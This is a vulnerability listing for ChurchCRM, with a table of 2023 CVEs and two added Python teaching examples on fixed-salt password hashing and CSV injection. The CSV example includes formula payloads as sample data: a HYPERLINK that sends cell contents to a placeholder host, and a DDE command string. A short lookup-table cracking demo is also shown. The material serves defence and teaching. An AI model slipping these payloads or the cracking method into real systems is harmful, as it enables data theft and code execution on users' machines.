Vulnerabilities > ChurchCRM
DATE | CVE | TITLE | DESCRIPTION | RISK (CVSS base score) |
---|---|---|---|---|
2023-05-04 | CVE-2023-29842 | SQL injection vulnerability in ChurchCRM 4.5.4 | The ChurchCRM 4.5.4 endpoint /EditEventTypes.php is vulnerable to time-based blind SQL injection via the EN_tyid POST parameter. | 8.8 |
2023-04-25 | CVE-2023-25346 | Cross-site scripting vulnerability in ChurchCRM 4.5.3 | A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found. | 6.1 |
2023-04-25 | CVE-2023-25347 | Cross-site scripting vulnerability in ChurchCRM 4.5.3 | A stored cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via input fields. | 5.4 |
2023-04-25 | CVE-2023-25348 | Improper neutralization of formula elements in a CSV file in ChurchCRM 4.5.3 | ChurchCRM 4.5.3 contains a CSV injection vulnerability via the Last Name and First Name input fields when creating a new person. | 7.8 |
2023-04-25 | CVE-2023-26839 | Cross-site request forgery (CSRF) vulnerability in ChurchCRM 4.5.3 | A cross-site request forgery (CSRF) vulnerability in ChurchCRM v4.5.3 allows attackers to edit information for existing people on the site. | 4.3 |
2023-04-25 | CVE-2023-26840 | Cross-site request forgery (CSRF) vulnerability in ChurchCRM 4.5.3 | A cross-site request forgery (CSRF) vulnerability in ChurchCRM v4.5.3 allows attackers to set a person to a user and make that user an Administrator. | 5.3 |
2023-04-25 | CVE-2023-26841 | Cross-site request forgery (CSRF) vulnerability in ChurchCRM 4.5.3 | A cross-site request forgery (CSRF) vulnerability in ChurchCRM v4.5.3 allows attackers to change any user's password except that of the currently logged-in user. | 6.5 |
2023-04-25 | CVE-2023-26843 | Cross-site scripting vulnerability in ChurchCRM 4.5.3 | A stored cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via NoteEditor.php. | 5.4 |
2023-04-04 | CVE-2023-26855 | Use of insufficiently random values in ChurchCRM 4.5.3 | The password hashing in ChurchCRM v4.5.3 uses a non-random (fixed) salt value, which allows attackers to use precomputed hash tables or dictionary attacks to crack the hashed passwords. | 7.5 |
2023-03-16 | CVE-2023-27059 | Cross-site scripting vulnerability in ChurchCRM 4.5.3 | A cross-site scripting (XSS) vulnerability in the Edit Group function of ChurchCRM v4.5.3 allows attackers to execute arbitrary web script or HTML via a crafted payload injected into the Edit Group Name text field. | 5.4 |
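The fixed-salt weakness behind CVE-2023-26855 is easiest to see side by side with a per-user random salt. The Python below is an added example written for this page, not ChurchCRM's own (PHP) code; the page does not say which hash function ChurchCRM uses, so the SHA-256-over-constant-prefix scheme, the salt value and the sample users and passwords are all constructed for illustration. It shows the two consequences the table entry names: identical passwords produce identical hashes, and a single precomputed table cracks every user at once. With a random salt and a slow KDF, neither holds.

```python
import hashlib
import os
import secrets
from typing import Optional

# Hypothetical application-wide constant salt (constructed for this example).
FIXED_SALT = b"app-wide-constant-salt"
PBKDF2_ROUNDS = 100_000


def hash_fixed_salt(password: str) -> str:
    """Weak scheme: every user's password is hashed with the same salt."""
    return hashlib.sha256(FIXED_SALT + password.encode()).hexdigest()


def hash_random_salt(password: str, salt: Optional[bytes] = None) -> tuple:
    """Per-user random salt plus a slow KDF; returns (salt, hex digest)."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest.hex()


def verify_random_salt(password: str, salt: bytes, expected_hex: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    _, candidate = hash_random_salt(password, salt)
    return secrets.compare_digest(candidate, expected_hex)


def build_lookup_table(wordlist: list) -> dict:
    """Precompute hash -> password once; with a fixed salt it applies to every user."""
    return {hash_fixed_salt(w): w for w in wordlist}


def crack_with_table(stored: dict, table: dict) -> dict:
    """One dictionary lookup per stored hash, no per-user hashing work at all."""
    return {user: table.get(h) for user, h in stored.items()}


# Constructed sample data: usernames, passwords and wordlist invented for this example.
SAMPLE_PASSWORDS = {"alice": "Summer2023", "bob": "church123", "carol": "Summer2023"}
SAMPLE_WORDLIST = ["password", "church123", "Summer2023", "letmein"]


def demo_fixed_salt() -> dict:
    """Fixed salt: alice and carol share a hash, and the table recovers everyone."""
    stored = {u: hash_fixed_salt(p) for u, p in SAMPLE_PASSWORDS.items()}
    assert stored["alice"] == stored["carol"]
    return crack_with_table(stored, build_lookup_table(SAMPLE_WORDLIST))


def demo_random_salt() -> bool:
    """Random salt: same password, two users, two hashes; the table matches nothing."""
    table = build_lookup_table(SAMPLE_WORDLIST)
    salt_a, hash_a = hash_random_salt("Summer2023")
    _, hash_c = hash_random_salt("Summer2023")
    return (
        hash_a != hash_c
        and table.get(hash_a) is None
        and verify_random_salt("Summer2023", salt_a, hash_a)
        and not verify_random_salt("Summer2024", salt_a, hash_a)
    )


if __name__ == "__main__":
    print(demo_fixed_salt())   # every sample user recovered by table lookup
    print(demo_random_salt())  # True
```

The point of the random salt is not secrecy (it is stored next to the hash) but that the attacker's precomputation cannot be shared across users; the slow KDF then makes each per-user guess expensive. In a real application the KDF and its parameters should come from the platform's password-hashing API rather than a hand-rolled scheme.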
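CVE-2023-25348 is the classic CSV/formula injection case: a name field that is later exported to CSV and opened in a spreadsheet. The Python below is an added example written for this page, not ChurchCRM's code, and the record layout, payload strings and field names are constructed; it shows an export that is injectable, the usual neutralization (prefixing cells that begin with a formula trigger), and a reader-side check that confirms no formula-looking cell survives.

```python
import csv
import io

# Leading characters that spreadsheet applications treat as a formula or as field/record
# control; the list follows the commonly published CSV-injection guidance.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")


def neutralize_cell(value: str) -> str:
    """Prefix a cell with a single quote when it would otherwise be parsed as a formula."""
    if value and value[0] in FORMULA_TRIGGERS:
        return "'" + value
    return value


def export_people(people: list, neutralize: bool = True) -> str:
    """Render (first, last) pairs as CSV; with neutralize=False the output is injectable."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["FirstName", "LastName"])
    for first, last in people:
        row = [first, last]
        if neutralize:
            row = [neutralize_cell(c) for c in row]
        writer.writerow(row)
    return buf.getvalue()


def has_formula_cells(csv_text: str) -> bool:
    """Reader-side check: does any parsed data cell still start with a formula trigger?"""
    reader = csv.reader(io.StringIO(csv_text))
    next(reader)  # skip the header row
    return any(cell and cell[0] in FORMULA_TRIGGERS for row in reader for cell in row)


# Constructed sample records: one ordinary name and two formula-style payloads of the
# kind documented for CSV injection (a HYPERLINK formula and a DDE-style command string).
SAMPLE_PEOPLE = [
    ("Jane", "Smith"),
    ('=HYPERLINK("http://example.invalid/?x="&A1,"click")', "Doe"),
    ("Bob", "=cmd|' /C calc'!A0"),
]


if __name__ == "__main__":
    print(export_people(SAMPLE_PEOPLE, neutralize=False))
    print(export_people(SAMPLE_PEOPLE))
```

Two caveats a practitioner will hit: the leading quote is shown literally by most CSV importers, so the fix belongs at the export boundary and not in the stored name; and `-` and `+` prefixes also match legitimate values (negative numbers, some phone formats), so apply the rule only to free-text columns. Quoting every cell (`QUOTE_ALL`) is what keeps a payload containing commas or quotes from breaking out of its field.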